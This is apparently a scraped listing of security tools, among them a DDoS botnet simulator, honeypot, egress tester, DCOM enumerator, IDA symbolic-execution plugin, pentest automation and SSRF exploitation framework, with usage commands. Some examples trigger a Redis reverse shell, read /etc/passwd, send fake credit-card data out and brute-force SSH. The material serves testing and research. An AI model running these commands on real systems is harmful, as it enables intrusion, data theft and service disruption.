image
BoNeSi , the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks. _ What traffic can be generated? _ BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly configurable and rates, data volume, source IP addresses, URLs and other parameters can be configured. _ What makes it different from other tools? _ There are plenty of other tools out there to spoof IP addresses with UDP and ICMP, but for TCP spoofing, there is no solution. BoNeSi is the first tool to simulate HTTP-GET floods from large-scale bot networks. BoNeSi also tries to avoid to generate packets with easy identifiable patterns (which can be filtered out easily). _ Where can I run BoNeSi ? _ We highly recommend to run BoNeSi in a closed testbed environment. However, UDP and ICMP attacks could be run in the internet as well, but you should be carefull. HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi . _ How does TCP Spoofing work? _ BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi _ How good is the perfomance of BoNeSi ? _ We focused very much on performance in order to simulate big botnets. On an AMD Opteron with 2Ghz we were able to generate up to 150,000 packets per second. On a more recent AMD Phenom II X6 1100T with 3.3Ghz you can generate 300,000 pps (running on 2 cores). _ Are BoNeSi attacks successful? _ Yes, they are very successful. UDP/ ICMP attacks can easily fill the bandwidth and HTTP-Flooding attacks knock out webservers fast. We also tested BoNeSi against state-of-the-art commercial DDoS mitigation systems and where able to either crash them or hiding the attack from being detected. A demo video of BoNeSi in action can be found here . Detailed Information BoNeSi is a network traffic generator for different protocol types. The attributes of the created packets and connections can be controlled by several parameters like send rate or payload size or they are determined by chance. It spoofs the source ip addresses even when generating tcp traffic. Therefor it includes a simple tcp-stack to handle tcp connections in promiscuous mode. For correct work, one has to ensure that the response packets are routed to the host at which BoNeSi is running. Therefore BoNeSi cannot used in arbitrary network infrastructures. The most advanced kind of traffic that can be generated are http requests. TCP/HTTP In order to make the http requests more realistic, several things are determined by chance: source port ttl: 3..255 tcp options: out of seven different real life options with different lengths and probabilities user agent for http header: out of a by file given list (an example file is included, see below) Copyright 2006-2007 Deutsches Forschungszentrum fuer Kuenstliche Intelligenz This is free software. Licensed under the Apache License, Version 2.0. There is NO WARRANTY, to the extent permitted by law. Installation :~$ ./configure :~$ make :~$ make install Usage :~$ bonesi [OPTION…] Options: -i, –ips=FILENAME filename with ip list -p, –protocol=PROTO udp (default), icmp or tcp -r, –send_rate=NUM packets per second, 0 = infinite (default) -s, –payload_size=SIZE size of the paylod, (default: 32) -o, –stats_file=FILENAME filename for the statistics, (default: ‘stats') -c, –max_packets=NUM maximum number of packets (requests at tcp/http), 0 = infinite (default) –integer IPs are integers in host byte order instead of in dotted notation -t, –max_bots=NUM determine max_bots in the 24bit prefix randomly (1-256) -u, –url=URL the url (default: ‘/') (only for tcp/http) -l, –url_list=FILENAME filename with url list (only for tcp/http) -b, –useragent_list=FILENAME filename with useragent list (only for tcp/http) -d, –device=DEVICE network listening device (only for tcp/http, e.g. eth1) -m, –mtu=NUM set MTU, (default 1500). Currently only when using TCP. -f, –frag=NUM set fragmentation mode (0=IP, 1=TCP, default: 0). Currently only when using TCP. -v, –verbose print additional debug messages -h, –help print help message and exit Additionally Included Example Files 50k-bots 50,000 ip addresses generated randomly to use with –ips option browserlist.txt several browser identifications to use with –useragentlist option urllist.txt several urls to use with –urllist option Download Bonesi

image
A low interaction honeypot with the capability to be more of a medium interaction honeypot. HoneyPy is written in Python2 and is intended to be easy to: install and deploy extend with plugins and loggers run with custom configurations Feel free to follow the QuickStart Guide to dive in directly. The main documentation can be found at the HoneyPy Docs site. Live HoneyPy data gets posted to: Twitter: https://twitter.com/HoneyPyLog Web service endpoint and displayed via the HoneyDB web site: https://riskdiscovery.com/honeydb Leave an issue or feature request! Use the GitHub issue tracker to tell us whats on your mind. Pull requests are welcome! If you would like to create new plugins or improve existing ones, please do. NOTE: HoneyPy has primarily been tested and run on Debian and Ubuntu using Python 2.7.9. Overview HoneyPy comes with a lot of plugins included. The level of interaction is determined by the functionality of the used plugin. Plugins can be created to emulate UDP or TCP based services to provide more interaction. All activity is logged to a file by default, but posting honeypot activity to Twitter or a web service endpoint can be configured as well. Examples : Plugins: ElasticSearch SIP etc. Loggers: HoneyDB Twitter etc. Download HoneyPy

image
Egress-Assess is a tool used to test egress data detection capabilities. Setup To setup, run the included setup script, or perform the following: Install pyftpdlib Generate a server certificate and store it as “server.pem” on the same level as Egress-Assess. This can be done with the following command: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes Usage Blog posts are available here: https://www.christophertruncer.com/egress-assess-testing-egress-data-detection-capabilities/ https://www.christophertruncer.com/egress-assess-action-via-powershell/ Typical use case for Egress-Assess is to copy this tool in two locations. One location will act as the server, the other will act as the client. Egress-Assess can send data over FTP, HTTP, and HTTPS. To extract data over FTP, you would first start Egress-Assess’s FTP server by selecting “–server ftp” and providing a username and password to use: ./Egress-Assess.py –server ftp –username testuser –password pass123 Now, to have the client connect and send data to the ftp server, you could run… ./Egress-Assess.py –client ftp –username testuser –password pass123 –ip 192.168.63.149 –datatype ssn Also, you can setup Egress-Assess to act as a web server by running…. ./Egress-Assess.py –server https Then, to send data to the FTP server, and to specifically send 15 megs of credit card data, run the following command… ./Egress-Assess.py –client https –data-size 15 –ip 192.168.63.149 –datatype cc Download Egress-Assess

image
Fibratus is a tool which is able to capture the most of the Windows kernel activity – process/thread creation and termination, context switches, file system I/O, registry, network activity, DLL loading/unloading and much more. The kernel events can be easily streamed to a number of output sinks like AMQP message brokers, Elasticsearch clusters or standard output stream. You can use filaments (lightweight Python modules) to extend Fibratus with your own arsenal of tools and so leverage the power of the Python's ecosystem. Installation Download the latest release (Windows installer). The changelog and older releases can be found here . Alternatively, you can get fibratus from PyPI. Install the dependencies Download and install Python 3.4. Install Visual Studio 2015 (you'll only need the Visual C compiler to build the kstreamc extension). Make sure to export the VS100COMNTOOLS environment variable so it points to %VS140COMNTOOLS% . Get Cython : pip install Cython >=0.23.4 . Install fibratus via the pip package manager: pip install fibratus Documentation See the wiki . Download Fibratus

image
TROMMEL sifts through embedded device files to identify potential vulnerable indicators. TROMMEL identifies the following indicators related to: Secure Shell (SSH) key files Secure Socket Layer (SSL) key files Internet Protocol (IP) addresses Uniform Resource Locator (URL) email addresses shell scripts web server binaries configuration files database files specific binaries files (i.e. Dropbear, BusyBox, etc.) shared object library files web application scripting variables, and Android application package (APK) file permissions. TROMMEL has also integrated vFeed which allows for further in-depth vulnerability analysis of identified indicators. Dependencies Python-Magic – See documentation for instructions for Python3-magic installation vFeed Database – For non-commercial use, register and download the Community Edition database Usage $ trommel.py –help Output TROMMEL results to a file based on a given directory. By default, only searches plain text files. $ trommel.py -p /directory -o output_file Output TROMMEL results to a file based on a given directory. Search both binary and plain text files. $ trommel.py -p /directory -o output_file -b Notes The intended use of TROMMEL is to assist researchers during firmware analysis. TROMMEL has been tested using Python3 on Kali Linux x86_64. TROMMEL was written with the intent to help with identifying indicators that may contain vulnerabilities found in firmware of embedded devices. References vFeed Firmwalker Lua Code: Security Overview and Practical Approaches to Static Analysis by Andrei Costin Author Kyle O'Meara – komeara AT cert DOT org Download Trommel

image
DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is build to work with Powershell 2.0 but will work with all versions above as well. The script currently supports the following Windows operating systems (both x86 and x64): Microsoft Windows 7 Microsoft Windows 10 Microsoft Windows Server 2012 / 2012 R2 Microsoft Windows Server 2016 How it works The script was made based on the research done by Matt Nelson ( @enigma0x3 ), especially the round 2 blogpost that goes into finding DCOM applications that might be useful for pentesters and red teams. First a remote connection with the target system is made, this connection is used throughout the script for a multitude of operations. A Powershell command is executed on the target system that retrieves all the DCOM applications and their AppID's. The AppID's are used to loop through the Windows Registry and check for any AppID that does not have the LaunchPermission subkey set in their entry, these AppID's are stored and used to retrieve their associated CLSID's. The script uses a specific blacklist with each OS, this is why there are different options for the target operating system. The blacklist skips CLSID entries that might hang the script because of DCOM applications that cannot be activated, this reduces the load on the target system and reduces the time for the script to complete. With the CLSID, the DCOM application associated with it can be activated. The ‘Shortcut' CLSID is used to count the amount of MemberTypes associated with it, this is done to check the default amount of MemberTypes . This number is used to check for the CLSID's that hold anything different than this amount. The script does this with the CLSID of the ‘Shortcut' ( HKEY_CLASSES_ROOTCLSID{00021401-0000-0000-C000-000000000046} ) because this is a shared CLSID across the Microsoft Windows operating systems. The CLSID's with a different amount of MemberTypes might hold a Method or Property that can be (ab)used, and will be added to an array. The CLSID's in the array are being checked on strings in the MemberTypes that might indicate a way to (ab)use it, this list of strings can be found in the VulnerableSubset file. Please note that this list is by no means a complete list to find every single vulnerable DCOM application, but this list being a dynamic part of the process should give the user of the script a way to look for specific strings that migth indicate a functionality of a DCOM application that might be useful for their purpose. The results of the script are outputted in a HTML report and should be usable for auditing a system as a preventive measure. For the offensive side I created an Empire module which at the time of writing is awaiting approval to be added to the master branch. If you would like to add this to Empire yourself you can do so by adding the module located here . For a full technical explanation of the idea, the script and possible detection methods you can read the research paper associated with this. Prerequisites The script, while not being used as an Empire module, has some limitations as the working of the script and how it connects with the target machine differs. For this script to work, the Windows Remote Management services need to be allowed in the Windows Firewall (5985); If the target system's network profile is set to Public the following command needs to be executed to allow Windows Remote Management services being used on the target system: Enable-PSRemoting -SkipNetworkProfilecheck -Force This script only works when one has the credentials of a local Administrator on the target system. Without these credentials you will not be able to start a remote session with the target machine, or be able to activate DCOM applications. Example usage When in a Microsoft Windows domain: .DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System] -Domain [Domain name] When not in a Microsoft Windows domain: .DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System] Limitations Currently the script does try to release any instantiated / activated DCOM applications but some activations start new processes (such as Internet Explorer), the process could be stopped but this would mean that if a user on the target system is using that particular application, this process will stop for them as well; Another thing, which probably has to do with bad my coding skills, is that the script might introduce considerable load on the target system if the target system does not have a lot of resources. Be considerate when using this in a production environment or on servers; The script might take some time to execute completely, this depends on the amount of DCOM applications and the size of the vulnerable subset file. Acknowledgements This script was inspired by a DCOM lateral movement workshop that was given by Eva Tanaskoska, without this workshop the whole idea for trying to enumerate this in an automated manner would never be conceived. Thanks to Matt Nelson's (a.k.a. @enigma0x3 ) research I was able to find enough information to come up with a form of automation. Philip Tsukerman's article which sums up most of the available DCOM techniques for lateral movement and going into how these work. Download DCOMrade

image
Ponce (pronounced _ [ ‘poN θe ] _ pon-they ) is an IDA Pro plugin that provides users the ability to perform taint analysis and symbolic execution over binaries in an easy and intuitive fashion. With Ponce you are one click away from getting all the power from cutting edge symbolic execution. Entirely written in C/C++. Why? Symbolic execution is not a new concept in the security community. It has been around for years but it is not until the last couple of years that open source projects like Triton and Angr have been created to address this need. Despite the availability of these projects, end users are often left to implement specific use cases themselves. We addressed these needs by creating Ponce, an IDA plugin that implements symbolic execution and taint analysis within the most used disassembler/debugger for reverse engineers. Installation Ponce works with both x86 and x64 binaries in IDA 6.8 and IDA 6.9x. Installing the plugin is as simple as copying the appropiate files from the latest builds to the plugins folder in your IDA installation directory. IDA 7.0. Ponce has initial support of IDA 7.0 for both x86 and x64 binaries in Windows. The plugin named Ponce64.dll should be copied from the latest_builds to the plugins folder in your IDA installation directory. Starting from version 7.0, IDA64 should be used to work with both x86 and x64 binaries. Don't forget to register Ponce in plugins.cfg located in the same folder by adding the following line: Ponce Ponce Ctrl+Shift+Z 0 WIN OS Support Ponce works on Windows, Linux and OSX natively! Use cases Exploit development : Ponce can help you create an exploit in a far more efficient manner as the exploit developer may easily see what parts of memory and which registers you control, as well as possible addresses which can be leveraged as ROP gadgets. Malware Analysis : Another use of Ponce is related to malware code. Analyzing the commands a particular family of malware supports is easily determined by symbolizing a simple known command and negating all the conditions where the command is being checked. Protocol Reversing : One of the most interesting Ponce uses is the possibility of recognizing required magic numbers, headers or even entire protocols for controlled user input. For instance, Ponce can help you to list all the accepted arguments for a given command line binary or extract the file format required for a specific file parser. CTF : Ponce speeds up the process of reverse engineer binaries during CTFs. As Ponce is totally integrated into IDA you don't need to worry about setup timing. It's ready to be used! The plugin will automatically run, guiding you through the initial configuration the first time it is run. The configuration will be saved to a configuration file so you won't have to worry about the config window again. Use modes Tainting engine : This engine is used to determine at every step of the binary's execution which parts of memory and registers are controllable by the user input. Symbolic engine : This engine maintains a symbolic state of registers and part of memory at each step in a binary's execution path. Examples Use symbolic execution to solve a crackMe Here we can see the use of the symbolic engine and how we can solve constrains: Passing simple aaaaa as argument. We first select the symbolic engine. We convert to symbolic the memory pointed by argv[1] ( aaaaa ) Identify the symbolic condition that make us win and solve it. Test the solution. The crackme source code can be found here Negate and inject a condition In the next gif we can see the use of automatic tainting and how we can negate a condition and inject it in memory while debugging: We select the symbolic engine and set the option to symbolize argv . We identify the condition that needs to be satisfied to win the crackMe. We negate an inject the solution everytime a byte of our input is checked against the key. Finally we get the key elite that has been injected in memory and therefore reach the Win code. The crackme source code can be found here Using the tainting engine to track user controlled input In this example we can see the use of the tainting engine with cmake. We are: Passing a file as argument to cmake to have him parsing it. We select we want to use the tainting engine We taint the buffer that “`fread()““ reads from the file. We resume the execution under the debugger control to see where the taint input is moved to. Ponce will rename the tainted functions. These are the functions that somehow the user has influence on, not the simply executed functions. Use Negate, Inject & Restore In the next example we are using the snapshot engine: Passing a file as argument. We select we want to use the symbolic engine. We taint the buffer that “`fread()““ reads from the file. We create a snapshot in the function that parses the buffer read from the file. When a condition is evaluated we negate it, inject the solution in memory and restore the snapshot with it. The solution will be “valid” so we will satisfy the existent conditions. The example source code can be found here Usage In this section we will list the different Ponce options as well as keyboard shortcuts: Access the configuration and taint/symbolic windows: Edit > Ponce > Show Config (Ctl+Shift+P and Ctl+Alt+T) Enable/Disable Ponce tracing (Ctl+Shift+E) Symbolize/taint a register (Ctl+Shift+R) Symbolize/taint memory. Can be done from the IDA View or the Hex View (Ctl+Shift+M) Solve formula (Ctl+Shift+S) Negate & Inject (Ctl+Shift+N) Negate, Inject & Restore Snaphot (Ctl+Shift+I) Create Execution Snapshot (Ctl+Shift+C) Restore Execution Snapshot (Ctl+Shift+S) Delete Execution Snapshot (Ctl+Shift+D) Execute Native (Ctl+Shift+F9) Triton Ponce relies on the Triton framework to provide semantics, taint analysis and symbolic execution. Triton is an awesome Open Source project sponsored by Quarkslab and maintained mainly by Jonathan Salwan with a rich library. We would like to thank and endorse Jonathan's work with Triton. You rock! 🙂 Building We provide compiled binaries for Ponce, but if you want to build your own plugin you can do so using Visual Studio 2013. We tried to make the building process as easy as possible: Clone the project with submodules: git clone –recursive https://github.com/illera88/PonceProject.git Open BuildPonceBuildPonce.sln : The project configuration is ready to use the includes and libraries shipped with the project that reside in external-libs . The VS project has a Post-Build Event that will move the created binary plugin to the IDA plugin folder for you. copy /Y $(TargetPath) “C:Program Files (x86)IDA 6.9plugins” . NOTE: use your IDA installation path. The project has 4 build configurations: x86ReleaseStatic: will create the 32 bits version statically linking every third party library into a whole large plugin file. x86ReleaseZ3dyn: will create the 32 bits version statically linking every third party library but z3.lib. x64ReleaseStatic: will create the 64 bits version statically linking every third party library into a whole large plugin file. x64ReleaseZ3dyn: will create the 64 bits version statically linking every third party library but z3.lib. The static version of z3.lib is ~ 1.1Gb and the linking time is considerable. That's the main reason why we have a building version that uses z3 dynamically (as a dll). If you are using z3 dynamically don't forget to copy the libz3.dll file into the IDA's directory. If you want to build Triton for linux or MacOsX check this file: https://github.com/illera88/Ponce/tree/master/builds/PonceBuild/nix/README.md FAQ Why the name of Ponce? Juan Ponce de León (1474 – July 1521) was a Spanish explorer and conquistador. He discovered Florida in the United States. The IDA plugin will help you discover, explore and hopefully conquer the different paths in a binary. Can Ponce be used to analyze Windows, OS X and Linux binaries? Yes, you can natively use Ponce in IDA for Windows or remotely attach to a Linux or OS X box and use it. In the next Ponce version we will natively support Ponce for Linux and OS X IDA versions. How many instructions per second can handle Ponce? In our tests we reach to process 3000 instructions per second. We plan to use the PIN tracer IDA offers to increase the speed. Something is not working! Open an issue , we will solve it ASAP 😉 I love your project! Can I collaborate? Sure! Please do pull requests and work in the opened issues. We will pay you in beers for help 😉 Limitations Concolic execution and Ponce have some problems: Symbolic memory load/write: When the index used to read a memory value is symbolic like in x = aray[symbolic_index] some problems arise that could lead on the loose of track of the tainted/symbolized user controled input. Triton doesn't work very well with floating point instructions . Authors Alberto Garcia Illera ( @algillera ) [email protected] Francisco Oca ( @francisco_oca ) [email protected] Download Ponce

image
kaboom is a script that automates the penetration test. It performs several tasks for each phase of pentest: Information gathering [nmap-unicornscan] TCP scan UDP scan Vulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole] It tests several services: smb ssh snmp smtp ftp tftp ms-sql mysql rdp http https and more… It finds the CVEs and then searchs them on exploit-db or Metasploit db. Exploitation [hydra] brute force ssh Usage kaboom supports two mode: Interactive mode: kaboom [ENTER] …and the script does the rest NON-interactive mode: kaboom [-s or –shutdown] If you use the shutdown option, kaboom will shutdown the machine at the end of tasks. If you want see this help: kaboom -h (or –help) Directory Hierarchy kaboom saves the results of commands in this way: Download Kaboom

image
SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz. Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. Guide / RTFM Basic install from the Github repository. git clone https://github.com/swisskyrepo/SSRFmap cd SSRFmap/ python3 ssrfmap.py usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [–lhost LHOST] [–lport LPORT] [–level LEVEL] optional arguments: -h, –help show this help message and exit -r REQFILE SSRF Request file -p PARAM SSRF Parameter to target -m MODULES SSRF Modules to enable -l HANDLER Start an handler for a reverse shell –lhost LHOST LHOST reverse shell –lport LPORT LPORT reverse shell –level [LEVEL] Level of test to perform (1-5, default: 1) The default way to use this script is the following. # Launch a portscan on localhost and read default files python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan # Triggering a reverse shell on a Redis python ssrfmap.py -r data/request.txt -p url -m redis –lhost=127.0.0.1 –lport=4242 -l 4242 # -l create a [listener]() for reverse shell on the specified port # –lhost and –lport work like in Metasploit, these values are used to create a reverse shell payload # –level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> … A quick way to test the framework can be done with data/example.py SSRF service. FLASK_APP=data/example.py flask run & python ssrfmap.py -r data/request.txt -p url -m readfiles Modules The following modules are already implemented and can be used with the -m argument. | Name | Description —|— | fastcgi | FastCGI RCE redis | Redis RCE github | Github Enterprise RCE < 2.8.7 zaddix | Zaddix RCE mysql | MySQL Command execution docker | Docker Infoleaks via API smtp | SMTP send mail portscan | Scan ports for the host networkscan | HTTP Ping sweep over the network readfiles | Read files such as /etc/passwd alibaba | Read files from the provider (e.g: meta-data, user-data) aws | Read files from the provider (e.g: meta-data, user-data) digitalocean | Read files from the provider (e.g: meta-data, user-data) socksproxy | SOCKS4 Proxy smbhash | Force an SMB authentication via a UNC Path Inspired by All you need to know about SSRF and how may we write tools to do auto-detect – Auxy How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! – Orange Tsai Blog on Gopherus Tool -SpyD3r Gopherus – Github SSRF testing – cujanovic Download SSRFmap

image
Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database … Screenshots Source code You can download the latest tarball by clicking here or latest zipball by clicking here. You can also download Pompem directly from its Git repository : $ git clone https://github.com/rfunix/Pompem.git Dependencies Pompem works out of the box with Python 3.5 on any platform and requires the following packages: Requests 2.9.1+ Installation Get Pompem up and running in a single command: $ pip3.5 install -r requirements.txt You may greatly benefit from using virtualenv , which isolates packages installed for every project. If you have never used it, simply check [this tutorial] ( http://docs.python-guide.org/en/latest/dev/virtualenvs ) . Usage To get the list of basic options and information about the project: $ python3.5 pompem.py -h Options: -h, –help show this help message and exit -s, –search text for search –txt Write txt File –html Write html File Examples of use: $ python3.5 pompem.py -s WordPress $ python3.5 pompem.py -s Joomla –html $ python3.5 pompem.py -s “Internet Explorer,joomla,wordpress” –html $ python3.5 pompem.py -s FortiGate –txt $ python3.5 pompem.py -s ssh,ftp,mysql Download Pompem